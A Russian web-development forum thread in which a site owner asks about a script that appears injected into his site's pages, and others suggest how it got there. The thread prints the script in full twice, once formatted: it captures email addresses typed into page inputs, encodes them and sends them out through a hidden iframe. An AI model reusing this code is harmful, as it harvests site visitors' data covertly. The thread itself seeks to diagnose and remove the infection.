Неизвестный скрипт / HTML, JavaScript, VBScript, CSS

ReSQL.ru

2.0.59

Планшетная версия Контакт Правила FAQ Помощь

Гость

Войти | Профиль | Очистить

Нов. | Гор. | Избр.

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Действия ...

Доб. в избранное
Игнор. тему
Прикреп. тему
Пометить прочит. / непрочит.
Фильтр:
Сообщения автора темы
Сообщение содержит вложения
Сообщение содержит картинки
Сообщение содержит видеоклипы
Сообщение содержит аудиоклипы
Сообщение содержит картинки или видео 18+

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Неизвестный скрипт / 7 сообщений из 7, страница 1 из 1

24.11.2016, 16:59

#39353896

mentol

Гость

Неизвестный скрипт

Добрый день!
Сегодня заметил непонятно откуда взявшийся скрипт <script src="/vgttkru/t_filter.js" async="" type="text/javascript"></script>

Он прописывается автоматически на создаваемых или редактируемых страницах сайта. Открывается по ссылке http://moskwa.rpk-service.su/vgttkru/t_filter.js

Внутри код:
(function(){function g(a,b){var c=a.createElement("script");c.type="text/javascript";c.async=!0;c.src="/vgttkru/t_filter.js";b&&(c.src+="?"+b);a.body.appendChild(c)}function m(a){return"/vgttkru/filter_proxy_iframe.html?q="+a+"/d"+location.hostname}function n(a){try{var b=document.getElementById("vegetatika-frame")||document.createElement("IFRAME");b.src=m(a);b.style.width="0px";b.style.height="0px";b.style.display="none";b.id="vegetatika-frame";document.getElementById("vegetatika-frame")||document.body.appendChild(b)}catch(c){}}
for(var f={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){var b="",c,d,e,g,l,h,k=0;for(a=f._utf8_encode(a);k<a.length;)c=a.charCodeAt(k++),d=a.charCodeAt(k++),e=a.charCodeAt(k++),g=c>>2,c=(c&3)<<4|d>>4,l=(d&15)<<2|e>>6,h=e&63,isNaN(d)?l=h=64:isNaN(e)&&(h=64),b=b+f._keyStr.charAt(g)+f._keyStr.charAt(c)+f._keyStr.charAt(l)+f._keyStr.charAt(h);return b},_utf8_encode:function(a){a=a.replace(/\r\n/g,"\n");for(var b="",c=0;c<a.length;c++){var d=a.charCodeAt(c);
128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b}},e=!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/),r=document.getElementsByTagName("body")[0].getElementsByTagName("input"),p=0;el=r[p];p++)if("text"==el.type||"email"==el.type||!el.type){var t=el.onblur||function(){},u=el.onkeydown||function(){},q=function(){var a=/^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)*(\.[a-z]{2,4})$/i;
this.value&&a.test(this.value)&&n(f.encode(this.value))};el.onblur=function(a){q.call(this);return t(a)};el.onkeydown=function(a){13==("which"in a?a.which:a.keyCode)&&q.call(this);return u(a)}}e&&(e=localStorage.getItem("vg_postponed_dt"))&&(-1!=location.hash.indexOf("#method-post")?(location.hash=location.hash.replace("#method-post",""),n(e)):(localStorage.removeItem("vg_postponed_dt"),window.location.replace(m(e)+"/r"+encodeURIComponent(window.location.href))));setInterval(function(){for(var a=
document.getElementsByTagName("iframe"),b=0;b<a.length;b++)if(!~(" "+a[b].className+" ").indexOf(" __vg__ ")){a[b].className+=" __vg__";try{g(a[b].contentWindow.document)}catch(c){}}},1E3);null!=function(a){var b=document.cookie;a+="=";var c=b.indexOf("; "+a);if(-1==c){if(c=b.indexOf(a),0!=c)return null}else{var c=c+2,d=document.cookie.indexOf(";",c);-1==d&&(d=b.length)}return unescape(b.substring(c+a.length,d))}("vg_do_not_send")&&"undefined"===typeof VG_ALREADY_ABORTED&&(window.VG_ALREADY_ABORTED=
!0,g(document,"do_not_send"))})();

Что это такое и нужно ли убирать, если нужно то как?
Спасибо за внимание))

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

24.11.2016, 18:05

#39353987

vkle

Участник

Откуда: Самара
Сообщения: 14 253
Рейтинг: 0 / 0

Неизвестный скрипт

По моей квартире бегают непонятно откуда взявшиеся существа (фото и видео прилагаются). Они издают какие-то звуки, путаются под ногами, и вообще, лезут абсолютно повсюду. Что это такое и нужно ли убирать, если нужно то как?
Прикольно? Мне - нет. Но Ваш вопрос звучит примерно так же.

Вам этот скрипт нужен? Нет? Убирайте.

Как? Ну, никто же кроме Вас не знает, чем и как Вы редактируете или создаёте страницы. Удаётся ли убрать код этими средствами или нет - тоже не понятно.

Ставьте вопрос иначе: после каких событий появилась эта дрянь, каковы возможные пути её проникновения.
Сам редактор добавляет этот код? Странный какой-то редактор. Если это визивиг из админки сайта, то он вполне может быть "модифицирован".
Может, пароль ФТП скомпрометирован?
Или на сайте давно уже поселился какой-нибудь пхп-шелл?
А может, в дырявый веб-браузер какая зараза залезла?
Может. И ещё есть сотни способов вписать левый контент.

В общем, просто убрать код - это даже не пол-дела, это много меньше. Сегодня уберёте, а завтра он опять появится. Закрыть пути попадания - вот это уже ближе к истине.

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.11.2016, 09:57

#39354313

mentol

Гость

Неизвестный скрипт

Нашел кое-что: vegetatika.ru - vgttkru

кеасперским 17 обновленным проверил ничего нет, virusdie тоже ничего не нашел, проверял также встроенным антивирусом reg.ru, какие будут идеи?

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.11.2016, 10:14

#39354329

вадя

Участник

Откуда: Екатеринбург
Сообщения: 19 399
Рейтинг: 0 / 0

Неизвестный скрипт

mentol,
сам скрипт безвреден, но он загружает что-то
попробуй обратиться на virusinfo.info

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.11.2016, 10:14

#39354330

Antonariy

Участник

Откуда: ☭
Сообщения: 80 221
Рейтинг: 0 / 0

Неизвестный скрипт

Код: javascript

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.

// JavaScript source code
(function () {
    function g(a, b) {
        var c = a.createElement("script");
        c.type = "text/javascript";
        c.async = !0;
        c.src = "/vgttkru/t_filter.js";
        b && (c.src += "?" + b);
        a.body.appendChild(c)
    }
    function m(a) { return "/vgttkru/filter_proxy_iframe.html?q=" + a + "/d" + location.hostname }
    function n(a) {
        try {
            var b = document.getElementById("vegetatika-frame") || document.createElement("IFRAME");
            b.src = m(a);
            b.style.width = "0px";
            b.style.height = "0px";
            b.style.display = "none";
            b.id = "vegetatika-frame";
            document.getElementById("vegetatika-frame") || document.body.appendChild(b)
        } catch (c) { }
    }
    for (
        var f = {
            _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
            encode: function (a) {
                var b = "", c, d, e, g, l, h, k = 0;
                for (a = f._utf8_encode(a) ; k < a.length;) c = a.charCodeAt(k++), d = a.charCodeAt(k++), e = a.charCodeAt(k++), g = c >> 2, c = (c & 3) << 4 | d >> 4, l = (d & 15) << 2 | e >> 6, h = e & 63, isNaN(d) ? l = h = 64 : isNaN(e) && (h = 64), b = b + f._keyStr.charAt(g) + f._keyStr.charAt(c) + f._keyStr.charAt(l) + f._keyStr.charAt(h); return b
            },
            _utf8_encode: function (a) {
                a = a.replace(/\r\n/g, "\n");
                for (var b = "", c = 0; c < a.length; c++) {
                    var d = a.charCodeAt(c);
                    128 > d ? b += String.fromCharCode(d) : (127 < d && 2048 > d ? b += String.fromCharCode(d >> 6 | 192) : (b += String.fromCharCode(d >> 12 | 224), b += String.fromCharCode(d >> 6 & 63 | 128)), b += String.fromCharCode(d & 63 | 128))
                }
                return b
            }
        },
        e = !!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/),
        r = document.getElementsByTagName("body")[0].getElementsByTagName("input"),
        p = 0;
        el = r[p];
        p++
     )
    if ("text" == el.type || "email" == el.type || !el.type) {
        var t = el.onblur || function () { }, u = el.onkeydown || function () { },
            q = function () {
                var a = /^[\w-]+(\.[\w-]+)*@[\w-]+(\.[\w-]+)*(\.[a-z]{2,4})$/i;
                this.value && a.test(this.value) && n(f.encode(this.value))
            };
        el.onblur = function (a) {
            q.call(this);
            return t(a)
        };
        el.onkeydown = function (a) {
            13 == ("which" in a ? a.which : a.keyCode) && q.call(this);
            return u(a)
        }
    }
    e && (e = localStorage.getItem("vg_postponed_dt")) && (-1 != location.hash.indexOf("#method-post") ? (location.hash = location.hash.replace("#method-post", ""), n(e)) : (localStorage.removeItem("vg_postponed_dt"), window.location.replace(m(e) + "/r" + encodeURIComponent(window.location.href))));
    setInterval(
        function () {
            for (var a = document.getElementsByTagName("iframe"), b = 0; b < a.length; b++)
                if (!~(" " + a[b].className + " ").indexOf(" __vg__ ")) {
                    a[b].className += " __vg__";
                    try { g(a[b].contentWindow.document) } catch (c) { }
                }
        }, 1E3
    );
    null != function (a) {
        var b = document.cookie;
        a += "=";
        var c = b.indexOf("; " + a);
        if (-1 == c) {
            if (c = b.indexOf(a), 0 != c) return null
        } else {
            var c = c + 2, d = document.cookie.indexOf(";", c); -1 == d && (d = b.length)
        }
        return unescape(b.substring(c + a.length, d))
    }
    ("vg_do_not_send") && "undefined" === typeof VG_ALREADY_ABORTED && (window.VG_ALREADY_ABORTED =! 0, g(document, "do_not_send"))
})();

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.11.2016, 10:29

#39354345

Zenia

Участник

Откуда: Литва
Сообщения: 396
Рейтинг: 0 / 0

Неизвестный скрипт

Судя по всему у вас в WordPress движке завелись червячки, надо правильно искать https://yandex.ru/search/?text=wordpress virus&lr=11477

А вообще плохо это, когда, люди пользуются такими мощными фреймворками и при этом не разбираются хотя бы даже в PHP

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

25.11.2016, 11:12

#39354399

Изопропил

Участник

Сообщения: 33 046
Рейтинг: 0 / 0

Неизвестный скрипт

ZeniaА вообще плохо это, когда, люди пользуются такими мощными фреймворками и при этом не разбираются хотя бы даже в PHP
вообще-то так задумано )))

...

Рейтинг:

0 / 0

| Ответить | Цитировать | Написать

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&mobile=1&tid=1444886]:	0ms
get settings:	9ms
get forum list:	14ms
check forum access:	3ms
check topic access:	3ms
track hit:	167ms
get topic data:	12ms
get forum data:	2ms
get page messages:	48ms
get tp. blocked users:	2ms
others:	286ms

total:	546ms